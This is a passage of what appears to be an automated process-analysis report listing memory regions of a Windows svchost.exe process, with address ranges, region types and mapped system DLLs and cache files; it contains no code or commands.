1937 start_va = 0x32d45b0000 end_va = 0x32d45f2fff entry_point = 0x32d45b0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000f.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db") Region: id = 1938 start_va = 0x32d4600000 end_va = 0x32d46fffff entry_point = 0x0 region_type = private name = "private_0x00000032d4600000" filename = "" Region: id = 1939 start_va = 0x32d4700000 end_va = 0x32d4a36fff entry_point = 0x32d4700000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1940 start_va = 0x32d4a40000 end_va = 0x32d4b3ffff entry_point = 0x0 region_type = private name = "private_0x00000032d4a40000" filename = "" Region: id = 1941 start_va = 0x32d4b40000 end_va = 0x32d4c3ffff entry_point = 0x0 region_type = private name = "private_0x00000032d4b40000" filename = "" Region: id = 1942 start_va = 0x32d4c40000 end_va = 0x32d4d3ffff entry_point = 0x0 region_type = private name = "private_0x00000032d4c40000" filename = "" Region: id = 1943 start_va = 0x32d4d40000 end_va = 0x32d4e3ffff entry_point = 0x0 region_type = private name = "private_0x00000032d4d40000" filename = "" Region: id = 1944 start_va = 0x32d4e40000 end_va = 0x32d4f3ffff entry_point = 0x0 region_type = private name = "private_0x00000032d4e40000" filename = "" Region: id = 1945 start_va = 0x32d4f40000 end_va = 0x32d4fbffff entry_point = 0x0 region_type = private name = "private_0x00000032d4f40000" filename = "" Region: id = 1946 start_va = 0x32d4fc0000 end_va = 0x32d4fc1fff entry_point = 0x32d4fc0000 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 1947 start_va = 0x32d4fd0000 end_va = 0x32d4fd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d4fd0000" filename = "" Region: id = 1948 start_va = 0x32d4fe0000 end_va = 0x32d4fe2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d4fe0000" filename = "" Region: id = 1949 start_va = 0x32d4ff0000 end_va = 0x32d4ff6fff entry_point = 0x0 region_type = private name = "private_0x00000032d4ff0000" filename = "" Region: id = 1950 start_va = 0x32d5000000 end_va = 0x32d5000fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d5000000" filename = "" Region: id = 1951 start_va = 0x32d5010000 end_va = 0x32d5010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d5010000" filename = "" Region: id = 1952 start_va = 0x32d5020000 end_va = 0x32d5026fff entry_point = 0x0 region_type = private name = "private_0x00000032d5020000" filename = "" Region: id = 1953 start_va = 0x32d5030000 end_va = 0x32d50affff entry_point = 0x0 region_type = private name = "private_0x00000032d5030000" filename = "" Region: id = 1954 start_va = 0x32d5100000 end_va = 0x32d51fffff entry_point = 0x0 region_type = private name = "private_0x00000032d5100000" filename = "" Region: id = 1955 start_va = 0x32d5200000 end_va = 0x32d52fffff entry_point = 0x0 region_type = private name = "private_0x00000032d5200000" filename = "" Region: id = 1956 start_va = 0x32d5300000 end_va = 0x32d53fffff entry_point = 0x0 region_type = private name = "private_0x00000032d5300000" filename = "" Region: id = 1957 start_va = 0x32d5400000 end_va = 0x32d54fffff entry_point = 0x0 region_type = private name = "private_0x00000032d5400000" filename = "" Region: id = 1958 start_va = 0x32d5500000 end_va = 0x32d55fffff entry_point = 0x0 region_type = private name = "private_0x00000032d5500000" filename = "" Region: id = 1959 start_va = 0x32d5600000 end_va = 0x32d56fffff entry_point = 0x0 region_type = private name = "private_0x00000032d5600000" filename = "" Region: id = 1960 start_va = 0x32d5700000 end_va = 0x32d57fffff entry_point = 0x0 region_type = private name = "private_0x00000032d5700000" filename = "" Region: id = 1961 start_va = 0x32d5800000 end_va = 0x32d587ffff entry_point = 0x0 region_type = private name = "private_0x00000032d5800000" filename = "" Region: id = 1962 start_va = 0x32d5880000 end_va = 0x32d597ffff entry_point = 0x0 region_type = private name = "private_0x00000032d5880000" filename = "" Region: id = 1963 start_va = 0x32d5980000 end_va = 0x32d59fffff entry_point = 0x0 region_type = private name = "private_0x00000032d5980000" filename = "" Region: id = 1964 start_va = 0x32d5a00000 end_va = 0x32d5a7ffff entry_point = 0x0 region_type = private name = "private_0x00000032d5a00000" filename = "" Region: id = 1965 start_va = 0x32d5a80000 end_va = 0x32d5b0afff entry_point = 0x32d5a80000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1966 start_va = 0x32d5b10000 end_va = 0x32d5b8ffff entry_point = 0x0 region_type = private name = "private_0x00000032d5b10000" filename = "" Region: id = 1967 start_va = 0x32d5c00000 end_va = 0x32d5cfffff entry_point = 0x0 region_type = private name = "private_0x00000032d5c00000" filename = "" Region: id = 1968 start_va = 0x32d5d00000 end_va = 0x32d5dfffff entry_point = 0x0 region_type = private name = "private_0x00000032d5d00000" filename = "" Region: id = 1969 start_va = 0x32d5e00000 end_va = 0x32d5efffff entry_point = 0x0 region_type = private name = "private_0x00000032d5e00000" filename = "" Region: id = 1970 start_va = 0x32d5f00000 end_va = 0x32d5ffffff entry_point = 0x0 region_type = private name = "private_0x00000032d5f00000" filename = "" Region: id = 1971 start_va = 0x32d6000000 end_va = 0x32d607ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6000000" filename = "" Region: id = 1972 start_va = 0x32d6080000 end_va = 0x32d617ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6080000" filename = "" Region: id = 1973 start_va = 0x32d6180000 end_va = 0x32d61fffff entry_point = 0x0 region_type = private name = "private_0x00000032d6180000" filename = "" Region: id = 1974 start_va = 0x32d6200000 end_va = 0x32d62fffff entry_point = 0x0 region_type = private name = "private_0x00000032d6200000" filename = "" Region: id = 1975 start_va = 0x32d6300000 end_va = 0x32d637ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6300000" filename = "" Region: id = 1976 start_va = 0x32d6380000 end_va = 0x32d63fffff entry_point = 0x0 region_type = private name = "private_0x00000032d6380000" filename = "" Region: id = 1977 start_va = 0x32d6400000 end_va = 0x32d647ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6400000" filename = "" Region: id = 1978 start_va = 0x32d6480000 end_va = 0x32d64fffff entry_point = 0x0 region_type = private name = "private_0x00000032d6480000" filename = "" Region: id = 1979 start_va = 0x32d6540000 end_va = 0x32d6546fff entry_point = 0x0 region_type = private name = "private_0x00000032d6540000" filename = "" Region: id = 1980 start_va = 0x32d6550000 end_va = 0x32d664ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d6550000" filename = "" Region: id = 1981 start_va = 0x32d6650000 end_va = 0x32d674ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6650000" filename = "" Region: id = 1982 start_va = 0x32d6750000 end_va = 0x32d67cffff entry_point = 0x0 region_type = private name = "private_0x00000032d6750000" filename = "" Region: id = 1983 start_va = 0x32d6810000 end_va = 0x32d6816fff entry_point = 0x0 region_type = private name = "private_0x00000032d6810000" filename = "" Region: id = 1984 start_va = 0x32d6820000 end_va = 0x32d691ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6820000" filename = "" Region: id = 1985 start_va = 0x32d6920000 end_va = 0x32d699ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6920000" filename = "" Region: id = 1986 start_va = 0x32d69a0000 end_va = 0x32d6a1ffff entry_point = 0x0 region_type = private name = "private_0x00000032d69a0000" filename = "" Region: id = 1987 start_va = 0x32d6a20000 end_va = 0x32d6b1ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6a20000" filename = "" Region: id = 1988 start_va = 0x32d6b20000 end_va = 0x32d6c1ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6b20000" filename = "" Region: id = 1989 start_va = 0x32d6c20000 end_va = 0x32d6d1ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6c20000" filename = "" Region: id = 1990 start_va = 0x32d6d20000 end_va = 0x32d6e1ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6d20000" filename = "" Region: id = 1991 start_va = 0x32d6e20000 end_va = 0x32d6f1ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6e20000" filename = "" Region: id = 1992 start_va = 0x32d6f20000 end_va = 0x32d701ffff entry_point = 0x0 region_type = private name = "private_0x00000032d6f20000" filename = "" Region: id = 1993 start_va = 0x32d7020000 end_va = 0x32d711ffff entry_point = 0x0 region_type = private name = "private_0x00000032d7020000" filename = "" Region: id = 1994 start_va = 0x32d7120000 end_va = 0x32d721ffff entry_point = 0x0 region_type = private name = "private_0x00000032d7120000" filename = "" Region: id = 1995 start_va = 0x32d7220000 end_va = 0x32d731ffff entry_point = 0x0 region_type = private name = "private_0x00000032d7220000" filename = "" Region: id = 1996 start_va = 0x32d7380000 end_va = 0x32d7386fff entry_point = 0x0 region_type = private name = "private_0x00000032d7380000" filename = "" Region: id = 1997 start_va = 0x32d7390000 end_va = 0x32d748ffff entry_point = 0x0 region_type = private name = "private_0x00000032d7390000" filename = "" Region: id = 1998 start_va = 0x32d7490000 end_va = 0x32d756efff entry_point = 0x32d7490000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1999 start_va = 0x32d7570000 end_va = 0x32d75effff entry_point = 0x0 region_type = private name = "private_0x00000032d7570000" filename = "" Region: id = 2000 start_va = 0x32d7600000 end_va = 0x32d76fffff entry_point = 0x0 region_type = private name = "private_0x00000032d7600000" filename = "" Region: id = 2001 start_va = 0x32d7700000 end_va = 0x32d77fffff entry_point = 0x0 region_type = private name = "private_0x00000032d7700000" filename = "" Region: id = 2002 start_va = 0x32d7800000 end_va = 0x32d78fffff entry_point = 0x0 region_type = private name = "private_0x00000032d7800000" filename = "" Region: id = 2003 start_va = 0x32d7900000 end_va = 0x32d79fffff entry_point = 0x0 region_type = private name = "private_0x00000032d7900000" filename = "" Region: id = 2004 start_va = 0x32d7a00000 end_va = 0x32d7afffff entry_point = 0x0 region_type = private name = "private_0x00000032d7a00000" filename = "" Region: id = 2005 start_va = 0x32d7b00000 end_va = 0x32d7bfffff entry_point = 0x0 region_type = private name = "private_0x00000032d7b00000" filename = "" Region: id = 2006 start_va = 0x32d7c00000 end_va = 0x32d7cfffff entry_point = 0x0 region_type = private name = "private_0x00000032d7c00000" filename = "" Region: id = 2007 start_va = 0x32d7d00000 end_va = 0x32d7dfffff entry_point = 0x0 region_type = private name = "private_0x00000032d7d00000" filename = "" Region: id = 2008 start_va = 0x32d7e00000 end_va = 0x32d7efffff entry_point = 0x0 region_type = private name = "private_0x00000032d7e00000" filename = "" Region: id = 2009 start_va = 0x32d7f00000 end_va = 0x32d7ffffff entry_point = 0x0 region_type = private name = "private_0x00000032d7f00000" filename = "" Region: id = 2010 start_va = 0x32d8000000 end_va = 0x32d80fffff entry_point = 0x0 region_type = private name = "private_0x00000032d8000000" filename = "" Region: id = 2011 start_va = 0x32d8100000 end_va = 0x32d81fffff entry_point = 0x0 region_type = private name = "private_0x00000032d8100000" filename = "" Region: id = 2012 start_va = 0x32d8300000 end_va = 0x32d83fffff entry_point = 0x0 region_type = private name = "private_0x00000032d8300000" filename = "" Region: id = 2013 start_va = 0x32d8400000 end_va = 0x32d847ffff entry_point = 0x0 region_type = private name = "private_0x00000032d8400000" filename = "" Region: id = 2014 start_va = 0x32d8480000 end_va = 0x32d84fffff entry_point = 0x0 region_type = private name = "private_0x00000032d8480000" filename = "" Region: id = 2015 start_va = 0x32d8500000 end_va = 0x32d85fffff entry_point = 0x0 region_type = private name = "private_0x00000032d8500000" filename = "" Region: id = 2016 start_va = 0x32d8600000 end_va = 0x32d86fffff entry_point = 0x0 region_type = private name = "private_0x00000032d8600000" filename = "" Region: id = 2017 start_va = 0x32d8700000 end_va = 0x32d877ffff entry_point = 0x0 region_type = private name = "private_0x00000032d8700000" filename = "" Region: id = 2018 start_va = 0x32d87b0000 end_va = 0x32d87b6fff entry_point = 0x0 region_type = private name = "private_0x00000032d87b0000" filename = "" Region: id = 2019 start_va = 0x32d8800000 end_va = 0x32d88fffff entry_point = 0x0 region_type = private name = "private_0x00000032d8800000" filename = "" Region: id = 2020 start_va = 0x32d8a00000 end_va = 0x32d8afffff entry_point = 0x0 region_type = private name = "private_0x00000032d8a00000" filename = "" Region: id = 2021 start_va = 0x32d9000000 end_va = 0x32d90fffff entry_point = 0x0 region_type = private name = "private_0x00000032d9000000" filename = "" Region: id = 2022 start_va = 0x7df5ffba0000 end_va = 0x7ff5ffb9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffba0000" filename = "" Region: id = 2023 start_va = 0x7ff7cd230000 end_va = 0x7ff7cd231fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd230000" filename = "" Region: id = 2024 start_va = 0x7ff7cd23a000 end_va = 0x7ff7cd23bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd23a000" filename = "" Region: id = 2025 start_va = 0x7ff7cd23c000 end_va = 0x7ff7cd23dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd23c000" filename = "" Region: id = 2026 start_va = 0x7ff7cd240000 end_va = 0x7ff7cd241fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd240000" filename = "" Region: id = 2027 start_va = 0x7ff7cd242000 end_va = 0x7ff7cd243fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd242000" filename = "" Region: id = 2028 start_va = 0x7ff7cd244000 end_va = 0x7ff7cd245fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd244000" filename = "" Region: id = 2029 start_va = 0x7ff7cd246000 end_va = 0x7ff7cd247fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd246000" filename = "" Region: id = 2030 start_va = 0x7ff7cd24a000 end_va = 0x7ff7cd24bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd24a000" filename = "" Region: id = 2031 start_va = 0x7ff7cd24c000 end_va = 0x7ff7cd24dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd24c000" filename = "" Region: id = 2032 start_va = 0x7ff7cd24e000 end_va = 0x7ff7cd24ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd24e000" filename = "" Region: id = 2033 start_va = 0x7ff7cd250000 end_va = 0x7ff7cd251fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd250000" filename = "" Region: id = 2034 start_va = 0x7ff7cd252000 end_va = 0x7ff7cd253fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd252000" filename = "" Region: id = 2035 start_va = 0x7ff7cd254000 end_va = 0x7ff7cd255fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd254000" filename = "" Region: id = 2036 start_va = 0x7ff7cd256000 end_va = 0x7ff7cd257fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd256000" filename = "" Region: id = 2037 start_va = 0x7ff7cd258000 end_va = 0x7ff7cd259fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd258000" filename = "" Region: id = 2038 start_va = 0x7ff7cd25a000 end_va = 0x7ff7cd25bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd25a000" filename = "" Region: id = 2039 start_va = 0x7ff7cd25c000 end_va = 0x7ff7cd25dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd25c000" filename = "" Region: id = 2040 start_va = 0x7ff7cd25e000 end_va = 0x7ff7cd25ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd25e000" filename = "" Region: id = 2041 start_va = 0x7ff7cd260000 end_va = 0x7ff7cd261fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd260000" filename = "" Region: id = 2042 start_va = 0x7ff7cd262000 end_va = 0x7ff7cd263fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd262000" filename = "" Region: id = 2043 start_va = 0x7ff7cd264000 end_va = 0x7ff7cd265fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd264000" filename = "" Region: id = 2044 start_va = 0x7ff7cd266000 end_va = 0x7ff7cd267fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd266000" filename = "" Region: id = 2045 start_va = 0x7ff7cd268000 end_va = 0x7ff7cd269fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd268000" filename = "" Region: id = 2046 start_va = 0x7ff7cd26a000 end_va = 0x7ff7cd26bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd26a000" filename = "" Region: id = 2047 start_va = 0x7ff7cd26c000 end_va = 0x7ff7cd26dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd26c000" filename = "" Region: id = 2048 start_va = 0x7ff7cd26e000 end_va = 0x7ff7cd26ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd26e000" filename = "" Region: id = 2049 start_va = 0x7ff7cd270000 end_va = 0x7ff7cd271fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd270000" filename = "" Region: id = 2050 start_va = 0x7ff7cd272000 end_va = 0x7ff7cd273fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd272000" filename = "" Region: id = 2051 start_va = 0x7ff7cd274000 end_va = 0x7ff7cd275fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd274000" filename = "" Region: id = 2052 start_va = 0x7ff7cd276000 end_va = 0x7ff7cd277fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd276000" filename = "" Region: id = 2053 start_va = 0x7ff7cd278000 end_va = 0x7ff7cd279fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd278000" filename = "" Region: id = 2054 start_va = 0x7ff7cd27a000 end_va = 0x7ff7cd27bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd27a000" filename = "" Region: id = 2055 start_va = 0x7ff7cd27c000 end_va = 0x7ff7cd27dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd27c000" filename = "" Region: id = 2056 start_va = 0x7ff7cd27e000 end_va = 0x7ff7cd27ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd27e000" filename = "" Region: id = 2057 start_va = 0x7ff7cd280000 end_va = 0x7ff7cd281fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd280000" filename = "" Region: id = 2058 start_va = 0x7ff7cd282000 end_va = 0x7ff7cd283fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd282000" filename = "" Region: id = 2059 start_va = 0x7ff7cd284000 end_va = 0x7ff7cd285fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd284000" filename = "" Region: id = 2060 start_va = 0x7ff7cd286000 end_va = 0x7ff7cd287fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd286000" filename = "" Region: id = 2061 start_va = 0x7ff7cd288000 end_va = 0x7ff7cd289fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd288000" filename = "" Region: id = 2062 start_va = 0x7ff7cd28a000 end_va = 0x7ff7cd28bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd28a000" filename = "" Region: id = 2063 start_va = 0x7ff7cd28c000 end_va = 0x7ff7cd28dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd28c000" filename = "" Region: id = 2064 start_va = 0x7ff7cd28e000 end_va = 0x7ff7cd28ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd28e000" filename = "" Region: id = 2065 start_va = 0x7ff7cd290000 end_va = 0x7ff7cd291fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd290000" filename = "" Region: id = 2066 start_va = 0x7ff7cd292000 end_va = 0x7ff7cd293fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd292000" filename = "" Region: id = 2067 start_va = 0x7ff7cd294000 end_va = 0x7ff7cd295fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd294000" filename = "" Region: id = 2068 start_va = 0x7ff7cd296000 end_va = 0x7ff7cd297fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd296000" filename = "" Region: id = 2069 start_va = 0x7ff7cd298000 end_va = 0x7ff7cd299fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd298000" filename = "" Region: id = 2070 start_va = 0x7ff7cd29a000 end_va = 0x7ff7cd29bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd29a000" filename = "" Region: id = 2071 start_va = 0x7ff7cd29c000 end_va = 0x7ff7cd29dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd29c000" filename = "" Region: id = 2072 start_va = 0x7ff7cd29e000 end_va = 0x7ff7cd29ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd29e000" filename = "" Region: id = 2073 start_va = 0x7ff7cd2a0000 end_va = 0x7ff7cd2a1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd2a0000" filename = "" Region: id = 2074 start_va = 0x7ff7cd2a2000 end_va = 0x7ff7cd2a3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd2a2000" filename = "" Region: id = 2075 start_va = 0x7ff7cd2a4000 end_va = 0x7ff7cd2a5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd2a4000" filename = "" Region: id = 2076 start_va = 0x7ff7cd2a6000 end_va = 0x7ff7cd2a7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd2a6000" filename = "" Region: id = 2077 start_va = 0x7ff7cd2a8000 end_va = 0x7ff7cd2a9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd2a8000" filename = "" Region: id = 2078 start_va = 0x7ff7cd2aa000 end_va = 0x7ff7cd2abfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd2aa000" filename = "" Region: id = 2079 start_va = 0x7ff7cd2ac000 end_va = 0x7ff7cd2adfff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd2ac000" filename = "" Region: id = 2080 start_va = 0x7ff7cd2ae000 end_va = 0x7ff7cd2affff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd2ae000" filename = "" Region: id = 2081 start_va = 0x7ff7cd2b0000 end_va = 0x7ff7cd3affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7cd2b0000" filename = "" Region: id = 2082 start_va = 0x7ff7cd3b0000 end_va = 0x7ff7cd3d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7cd3b0000" filename = "" Region: id = 2083 start_va = 0x7ff7cd3d4000 end_va = 0x7ff7cd3d5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd3d4000" filename = "" Region: id = 2084 start_va = 0x7ff7cd3d6000 end_va = 0x7ff7cd3d7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd3d6000" filename = "" Region: id = 2085 start_va = 0x7ff7cd3d8000 end_va = 0x7ff7cd3d9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd3d8000" filename = "" Region: id = 2086 start_va = 0x7ff7cd3da000 end_va = 0x7ff7cd3dafff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd3da000" filename = "" Region: id = 2087 start_va = 0x7ff7cd3de000 end_va = 0x7ff7cd3dffff entry_point = 0x0 region_type = private name = "private_0x00007ff7cd3de000" filename = "" Region: id = 2088 start_va = 0x7ff7ce3a0000 end_va = 0x7ff7ce3acfff entry_point = 0x7ff7ce3a0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2089 start_va = 0x7ff9662f0000 end_va = 0x7ff966301fff entry_point = 0x7ff9662f0000 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 2090 start_va = 0x7ff966420000 end_va = 0x7ff966485fff entry_point = 0x7ff966420000 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 2091 start_va = 0x7ff966490000 end_va = 0x7ff9664a2fff entry_point = 0x7ff966490000 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 2092 start_va = 0x7ff966bc0000 end_va = 0x7ff966bcafff entry_point = 0x7ff966bc0000 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 2093 start_va = 0x7ff966bd0000 end_va = 0x7ff966cf0fff entry_point = 0x7ff966bd0000 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 2094 start_va = 0x7ff969650000 end_va = 0x7ff969ab9fff entry_point = 0x7ff969650000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2095 start_va = 0x7ff96a270000 end_va = 0x7ff96a2effff entry_point = 0x7ff96a270000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 2096 start_va = 0x7ff96a2f0000 end_va = 0x7ff96a386fff entry_point = 0x7ff96a2f0000 region_type = mapped_file name = "settingsync.dll" filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll") Region: id = 2097 start_va = 0x7ff96aec0000 end_va = 0x7ff96aed4fff entry_point = 0x7ff96aec0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 2098 start_va = 0x7ff96af30000 end_va = 0x7ff96af40fff entry_point = 0x7ff96af30000 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 2099 start_va = 0x7ff96af80000 end_va = 0x7ff96af95fff entry_point = 0x7ff96af80000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2100 start_va = 0x7ff96afa0000 end_va = 0x7ff96b077fff entry_point = 0x7ff96afa0000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 2101 start_va = 0x7ff96b080000 end_va = 0x7ff96b326fff entry_point = 0x7ff96b080000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2102 start_va = 0x7ff96b3a0000 end_va = 0x7ff96b3b9fff entry_point = 0x7ff96b3a0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 2103 start_va = 0x7ff96b3e0000 end_va = 0x7ff96b3f0fff entry_point = 0x7ff96b3e0000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 2104 start_va = 0x7ff96b400000 end_va = 0x7ff96b462fff entry_point = 0x7ff96b400000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 2105 start_va = 0x7ff96b470000 end_va = 0x7ff96b494fff entry_point = 0x7ff96b470000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2106 start_va = 0x7ff96b4a0000 end_va = 0x7ff96b4b3fff entry_point = 0x7ff96b4a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2107 start_va = 0x7ff96b7d0000 end_va = 0x7ff96b8c7fff entry_point = 0x7ff96b7d0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2108 start_va = 0x7ff96b8d0000 end_va = 0x7ff96b942fff entry_point = 0x7ff96b8d0000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 2109 start_va = 0x7ff96bdc0000 end_va = 0x7ff96bef6fff entry_point = 0x7ff96bdc0000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 2110 start_va = 0x7ff96c070000 end_va = 0x7ff96c10efff entry_point = 0x7ff96c070000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: 